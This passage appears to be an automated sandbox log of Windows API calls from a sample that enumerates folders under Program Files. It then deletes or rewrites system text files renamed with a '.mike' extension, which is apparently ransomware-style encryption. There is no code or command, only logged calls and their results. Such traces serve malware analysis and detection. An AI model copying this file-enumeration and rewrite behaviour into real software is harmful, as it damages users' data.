nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0129.013] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80105472, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x80105472, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x80105472, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0129.013] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1f4) returned 1 [0129.013] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af200) returned 1 [0129.013] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0129.013] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0129.013] CoTaskMemFree (pv=0x508980) [0129.013] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aed40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0129.013] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af27c) returned 1 [0129.013] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd943744, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x80105472, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x80105472, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0129.014] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80105472, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1ea1accb, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea1accb, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Accessories", cAlternateFileName="ACCESS~1")) returned 1 [0129.014] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd943744, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x1ea1accb, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea1accb, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="TableTextService", cAlternateFileName="TABLET~1")) returned 1 [0129.014] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd943744, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x1ea1accb, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea1accb, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="TableTextService", cAlternateFileName="TABLET~1")) returned 0 [0129.014] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af23c) returned 1 [0129.014] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af248) returned 1 [0129.015] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af27c) returned 1 [0129.015] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd943744, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x80105472, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x80105472, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0129.015] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80105472, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1ea1accb, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea1accb, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Accessories", cAlternateFileName="ACCESS~1")) returned 1 [0129.015] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd943744, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x1ea1accb, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea1accb, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="TableTextService", cAlternateFileName="TABLET~1")) returned 1 [0129.015] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0129.015] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af23c) returned 1 [0129.015] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af248) returned 1 [0129.016] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0129.016] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0129.016] CoTaskMemFree (pv=0x508980) [0129.016] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecf8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0129.016] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af234) returned 1 [0129.017] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80105472, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1ea1accb, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea1accb, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0129.017] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ea1accb, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x228ba44f, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea1accb, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0129.017] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8513b27, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa8513b27, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa8585f48, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x40ce00, dwReserved0=0x0, dwReserved1=0x0, cFileName="wordpad.exe", cAlternateFileName="")) returned 1 [0129.017] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbe46e7c7, ftCreationTime.dwHighDateTime=0x1ca0413, ftLastAccessTime.dwLowDateTime=0xbe46e7c7, ftLastAccessTime.dwHighDateTime=0x1ca0413, ftLastWriteTime.dwLowDateTime=0xb1b193f0, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x2f800, dwReserved0=0x0, dwReserved1=0x0, cFileName="WordpadFilter.dll", cAlternateFileName="")) returned 1 [0129.017] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0129.018] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1f4) returned 1 [0129.018] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af200) returned 1 [0129.018] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af234) returned 1 [0129.018] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80105472, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1ea1accb, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea1accb, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0129.018] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ea1accb, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x228ba44f, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea1accb, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0129.018] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8513b27, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa8513b27, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa8585f48, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x40ce00, dwReserved0=0x0, dwReserved1=0x0, cFileName="wordpad.exe", cAlternateFileName="")) returned 1 [0129.018] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbe46e7c7, ftCreationTime.dwHighDateTime=0x1ca0413, ftLastAccessTime.dwLowDateTime=0xbe46e7c7, ftLastAccessTime.dwHighDateTime=0x1ca0413, ftLastWriteTime.dwLowDateTime=0xb1b193f0, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x2f800, dwReserved0=0x0, dwReserved1=0x0, cFileName="WordpadFilter.dll", cAlternateFileName="")) returned 1 [0129.019] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbe46e7c7, ftCreationTime.dwHighDateTime=0x1ca0413, ftLastAccessTime.dwLowDateTime=0xbe46e7c7, ftLastAccessTime.dwHighDateTime=0x1ca0413, ftLastWriteTime.dwLowDateTime=0xb1b193f0, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x2f800, dwReserved0=0x0, dwReserved1=0x0, cFileName="WordpadFilter.dll", cAlternateFileName="")) returned 0 [0129.019] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1f4) returned 1 [0129.019] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0129.019] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0129.019] CoTaskMemFree (pv=0x508980) [0129.019] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0129.019] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ea1accb, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x228ba44f, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea1accb, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0129.020] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe506d6c, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0xe874c0b, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0xe506d6c, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xca00, dwReserved0=0x0, dwReserved1=0x0, cFileName="wordpad.exe.mui", cAlternateFileName="")) returned 1 [0129.020] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0129.020] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ea1accb, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x228ba44f, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea1accb, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0129.020] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe506d6c, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0xe874c0b, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0xe506d6c, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xca00, dwReserved0=0x0, dwReserved1=0x0, cFileName="wordpad.exe.mui", cAlternateFileName="")) returned 1 [0129.020] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe506d6c, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0xe874c0b, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0xe506d6c, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xca00, dwReserved0=0x0, dwReserved1=0x0, cFileName="wordpad.exe.mui", cAlternateFileName="")) returned 0 [0129.020] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0129.021] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0129.021] CoTaskMemFree (pv=0x508980) [0129.021] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecf8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0129.022] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd943744, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x1ea1accb, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea1accb, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0129.022] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ea1accb, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x228e0708, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea1accb, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0129.023] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x688296e7, ftCreationTime.dwHighDateTime=0x1ca0411, ftLastAccessTime.dwLowDateTime=0x688296e7, ftLastAccessTime.dwHighDateTime=0x1ca0411, ftLastWriteTime.dwLowDateTime=0xaf1e3ee0, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x4f600, dwReserved0=0x0, dwReserved1=0x0, cFileName="TableTextService.dll", cAlternateFileName="")) returned 1 [0129.023] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x482a6fb4, ftCreationTime.dwHighDateTime=0x1ca0402, ftLastAccessTime.dwLowDateTime=0x482a6fb4, ftLastAccessTime.dwHighDateTime=0x1ca0402, ftLastWriteTime.dwLowDateTime=0x77dccedc, ftLastWriteTime.dwHighDateTime=0x1c9ea14, nFileSizeHigh=0x0, nFileSizeLow=0x3f54, dwReserved0=0x0, dwReserved1=0x0, cFileName="TableTextServiceAmharic.txt", cAlternateFileName="")) returned 1 [0129.023] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x47eeed6d, ftCreationTime.dwHighDateTime=0x1ca0402, ftLastAccessTime.dwLowDateTime=0x47eeed6d, ftLastAccessTime.dwHighDateTime=0x1ca0402, ftLastWriteTime.dwLowDateTime=0x77e3f2fc, ftLastWriteTime.dwHighDateTime=0x1c9ea14, nFileSizeHigh=0x0, nFileSizeLow=0x136bf6, dwReserved0=0x0, dwReserved1=0x0, cFileName="TableTextServiceArray.txt", cAlternateFileName="")) returned 1 [0129.023] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77e3f2fc, ftCreationTime.dwHighDateTime=0x1c9ea14, ftLastAccessTime.dwLowDateTime=0x77e3f2fc, ftLastAccessTime.dwHighDateTime=0x1c9ea14, ftLastWriteTime.dwLowDateTime=0x77ed787c, ftLastWriteTime.dwHighDateTime=0x1c9ea14, nFileSizeHigh=0x0, nFileSizeLow=0xef486, dwReserved0=0x0, dwReserved1=0x0, cFileName="TableTextServiceDaYi.txt", cAlternateFileName="")) returned 1 [0129.023] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x47f6118a, ftCreationTime.dwHighDateTime=0x1ca0402, ftLastAccessTime.dwLowDateTime=0x47f6118a, ftLastAccessTime.dwHighDateTime=0x1ca0402, ftLastWriteTime.dwLowDateTime=0x7821d6bc, ftLastWriteTime.dwHighDateTime=0x1c9ea14, nFileSizeHigh=0x0, nFileSizeLow=0x196b56, dwReserved0=0x0, dwReserved1=0x0, cFileName="TableTextServiceSimplifiedQuanPin.txt", cAlternateFileName="")) returned 1 [0129.023] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x47ff9706, ftCreationTime.dwHighDateTime=0x1ca0402, ftLastAccessTime.dwLowDateTime=0x47ff9706, ftLastAccessTime.dwHighDateTime=0x1ca0402, ftLastWriteTime.dwLowDateTime=0x782dbd9c, ftLastWriteTime.dwHighDateTime=0x1c9ea14, nFileSizeHigh=0x0, nFileSizeLow=0x160e36, dwReserved0=0x0, dwReserved1=0x0, cFileName="TableTextServiceSimplifiedShuangPin.txt", cAlternateFileName="")) returned 1 [0129.023] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x480459c4, ftCreationTime.dwHighDateTime=0x1ca0402, ftLastAccessTime.dwLowDateTime=0x480459c4, ftLastAccessTime.dwHighDateTime=0x1ca0402, ftLastWriteTime.dwLowDateTime=0x783c05dc, ftLastWriteTime.dwHighDateTime=0x1c9ea14, nFileSizeHigh=0x0, nFileSizeLow=0x1b9fb0, dwReserved0=0x0, dwReserved1=0x0, cFileName="TableTextServiceSimplifiedZhengMa.txt", cAlternateFileName="")) returned 1 [0129.023] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x482a6fb4, ftCreationTime.dwHighDateTime=0x1ca0402, ftLastAccessTime.dwLowDateTime=0x482a6fb4, ftLastAccessTime.dwHighDateTime=0x1ca0402, ftLastWriteTime.dwLowDateTime=0x783c05dc, ftLastWriteTime.dwHighDateTime=0x1c9ea14, nFileSizeHigh=0x0, nFileSizeLow=0xafa8, dwReserved0=0x0, dwReserved1=0x0, cFileName="TableTextServiceYi.txt", cAlternateFileName="")) returned 1 [0129.024] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0129.030] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214 | out: lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214) returned 1 [0129.038] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceAmharic.txt", dwFileAttributes=0x80) returned 0 [0129.039] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceAmharic.txt", nBufferLength=0x105, lpBuffer=0x2aec34, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceAmharic.txt", lpFilePart=0x0) returned 0x4e [0129.039] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceAmharic.txt.mike" (normalized: "c:\\program files (x86)\\windows nt\\tabletextservice\\tabletextserviceamharic.txt.mike")) returned 1 [0129.041] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214 | out: lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214) returned 1 [0129.062] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceArray.txt.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceArray.txt.mike", lpFilePart=0x0) returned 0x51 [0129.063] SetFilePointer (in: hFile=0x288, lDistanceToMove=184320, lpDistanceToMoveHigh=0x2af104*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af104*=0) returned 0x2d000 [0129.064] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceArray.txt.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceArray.txt.mike", lpFilePart=0x0) returned 0x51 [0129.065] SetFilePointer (in: hFile=0x288, lDistanceToMove=194560, lpDistanceToMoveHigh=0x2af104*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af104*=0) returned 0x2f800 [0129.066] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceArray.txt.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceArray.txt.mike", lpFilePart=0x0) returned 0x51 [0129.067] SetFilePointer (in: hFile=0x288, lDistanceToMove=204800, lpDistanceToMoveHigh=0x2af104*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af104*=0) returned 0x32000 [0129.070] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceArray.txt.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceArray.txt.mike", lpFilePart=0x0) returned 0x51 [0129.070] SetFilePointer (in: hFile=0x288, lDistanceToMove=215040, lpDistanceToMoveHigh=0x2af104*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af104*=0) returned 0x34800 [0129.071] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceArray.txt.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows 